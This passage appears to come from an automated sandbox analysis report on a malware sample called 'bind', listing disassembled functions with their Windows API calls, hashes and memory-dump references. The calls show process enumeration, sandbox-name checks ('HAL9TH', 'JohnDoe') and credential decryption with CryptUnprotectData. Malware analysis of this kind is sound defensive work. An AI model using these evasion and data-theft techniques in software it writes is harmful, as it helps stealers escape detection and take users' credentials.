                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: String$Free$AllocCreateH_prologInstance_wtoi64
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1816492551-0
                                                                                                                                                                                      • Opcode ID: 19dab03f2153a3fcedcea12f68468dc1278e2cc2e8a79a9e9f641317858a2bc9
                                                                                                                                                                                      • Instruction ID: fa8ace5e6e847cee0ba9d83a74f5582bd5fc8e46c6092acf50a0adbd093fdb1d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 19dab03f2153a3fcedcea12f68468dc1278e2cc2e8a79a9e9f641317858a2bc9
                                                                                                                                                                                      • Instruction Fuzzy Hash: A8217C79D00649AFCB06DFA8C8849EEBFB9FF49301F188469F505EB220C7715A45CBA1
                                                                                                                                                                                      Function 0034FD18 Relevance: 9.0, APIs: 6, Instructions: 47processCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _EH_prolog.MSVCRT ref: 0034FD1D
                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?,00361ECC), ref: 0034FD43
                                                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 0034FD53
                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,?), ref: 0034FD65
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,?), ref: 0034FD79
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0034FD8F
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 186290926-0
                                                                                                                                                                                      • Opcode ID: d8211fd8e573a28c3e70cabb12c3cf3b015e483f0ea181fb9f00660d99aee7de
                                                                                                                                                                                      • Instruction ID: 7f4ba897aa092a6dd6f6dcc7e3a387a387aa00e58e44c08bc84a2dc2e29a47a9
                                                                                                                                                                                      • Opcode Fuzzy Hash: d8211fd8e573a28c3e70cabb12c3cf3b015e483f0ea181fb9f00660d99aee7de
                                                                                                                                                                                      • Instruction Fuzzy Hash: E2012D71A01219AFDB11DFA4DC05AEEBBF8EF05341F0081A5E81AE6150D7309B45CFA1
                                                                                                                                                                                      Function 0034FDF3 Relevance: 9.0, APIs: 6, Instructions: 45processCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _EH_prolog.MSVCRT ref: 0034FDF8
                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0034FE1E
                                                                                                                                                                                      • Process32First.KERNEL32(00000000,00000128), ref: 0034FE2E
                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0034FE40
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,?), ref: 0034FE54
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0034FE65
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 186290926-0
                                                                                                                                                                                      • Opcode ID: ab397bef79e9c6cb5be8fbc7ffa67b2c80c6cf881a1bd23a32932b38b0060761
                                                                                                                                                                                      • Instruction ID: dbe45bb7ff359a0ca577501bdacec8680cf2a71556db1034271c23d8b1b5fee1
                                                                                                                                                                                      • Opcode Fuzzy Hash: ab397bef79e9c6cb5be8fbc7ffa67b2c80c6cf881a1bd23a32932b38b0060761
                                                                                                                                                                                      • Instruction Fuzzy Hash: 200175759042199EDB12DFA4DC18BEFBBBCEF15341F048065E805E2251D7349B86CBA1
                                                                                                                                                                                      Function 0034E7E4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19memoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,HAL9TH,?,00341063,JohnDoe,003555D9), ref: 0034E7F0
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,HAL9TH,?,00341063,JohnDoe,003555D9), ref: 0034E7F7
                                                                                                                                                                                      • GetUserNameA.ADVAPI32(00000000,?), ref: 0034E80B
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                      • String ID: HAL9TH
                                                                                                                                                                                      • API String ID: 1206570057-1811034163
                                                                                                                                                                                      • Opcode ID: 2be45d2ce0f84a29640d3bc3778c195e759732b9a80411748051913ea27be671
                                                                                                                                                                                      • Instruction ID: ad975d9c4e52abd632112da14fdf9072b8ac63d04229b4cc006e3d590f27055f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2be45d2ce0f84a29640d3bc3778c195e759732b9a80411748051913ea27be671
                                                                                                                                                                                      • Instruction Fuzzy Hash: 12D05EB6200304BBE7059B96DC4DE8A7ABCEB88767F100095F602D32E0DAF09A448630
                                                                                                                                                                                      Function 61EAD2AC Relevance: 6.6, Strings: 5, Instructions: 334COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: strcmp
                                                                                                                                                                                      • String ID: BINARY$NOCASE$RTRIM$kqa$main
                                                                                                                                                                                      • API String ID: 1004003707-114998471
                                                                                                                                                                                      • Opcode ID: 694ae7556137f234ec2c6432c806d824fda4080725e1e85f3b9c2a892dd384d1
                                                                                                                                                                                      • Instruction ID: 60bcc8b0197c989f7013f8b1edc5a9d28cf944306873f66ca73508c1f88d5ce1
                                                                                                                                                                                      • Opcode Fuzzy Hash: 694ae7556137f234ec2c6432c806d824fda4080725e1e85f3b9c2a892dd384d1
                                                                                                                                                                                      • Instruction Fuzzy Hash: DEE149B4A087858BEB00DF68C59474ABBF1BF89308F24C86DEC989F395D779C8458B51
                                                                                                                                                                                      Function 0034EE16 Relevance: 6.1, APIs: 4, Instructions: 55processCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0035E266,00361678,003613FC), ref: 0034EE3E
                                                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 0034EE4E
                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,?), ref: 0034EEA4
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0034EEAF
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 907984538-0
                                                                                                                                                                                      • Opcode ID: 50373ede96c16ae01358e9887980cf49d15f8373d21c56836eba910937525a56
                                                                                                                                                                                      • Instruction ID: d9a1307dd1d088396eeb86c90661d17e2cbc3e4dbb69be621c7d2f305283f19c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 50373ede96c16ae01358e9887980cf49d15f8373d21c56836eba910937525a56
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A01C4316001146BDB03F7A4CC06EEF77FCBF89B00F014065F60AEA190EB34AA468B95
                                                                                                                                                                                      Function 0034F8C3 Relevance: 6.1, APIs: 4, Instructions: 53memoryencryptionCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0035E266,?,0000000F,0000000F,?,0034471F,?,?,?,?), ref: 0034F8E7
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,0034471F,?,?,?,?,?,?), ref: 0034F8F4
                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,0034471F,?,?,?,?,?,?), ref: 0034F8FB
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Heap$AllocateBinaryCryptProcessString
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 869800140-0
                                                                                                                                                                                      • Opcode ID: 156eea36222da6622e52b820e2f3d6c5f5203d69adb16a8c8fce5d48b64bee2a
                                                                                                                                                                                      • Instruction ID: 7515f1697c553eb26775e3aa5ceba8ea4f19fbf351526ccc643dfb9ecd3e89c4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 156eea36222da6622e52b820e2f3d6c5f5203d69adb16a8c8fce5d48b64bee2a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 04011771505209BFDF028FA5DC88DAFBBADFF49350B144468F94596210D731A991EB60
                                                                                                                                                                                      Function 0034E8AB Relevance: 6.0, APIs: 4, Instructions: 29memorytimeCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,003613FC), ref: 0034E8BC
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0034E8C3
                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?), ref: 0034E8D2
                                                                                                                                                                                      • wsprintfA.USER32 ref: 0034E8F0
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 362916592-0
                                                                                                                                                                                      • Opcode ID: 2bdcaea174d3295df13835e8eca66ec47c682167555f75c39892c66a9cb052e4
                                                                                                                                                                                      • Instruction ID: 278984088ac0cbd992d862376751b8aaef8280b72c06137f6a7471c8d1645199
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2bdcaea174d3295df13835e8eca66ec47c682167555f75c39892c66a9cb052e4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8AE02272704320BBEB10A7E8AC0EE9A376CAB41324F014211F61AD61D0E6B0998186A1
                                                                                                                                                                                      Function 00346AA4 Relevance: 4.5, APIs: 3, Instructions: 46memoryencryptionCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00346AC7
                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,?), ref: 00346ADF
                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 00346AFD
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2068576380-0
                                                                                                                                                                                      • Opcode ID: cae16a69884c4065627192b8a2cdd925281d3769dea07b65f7d5750a4d9baf9c
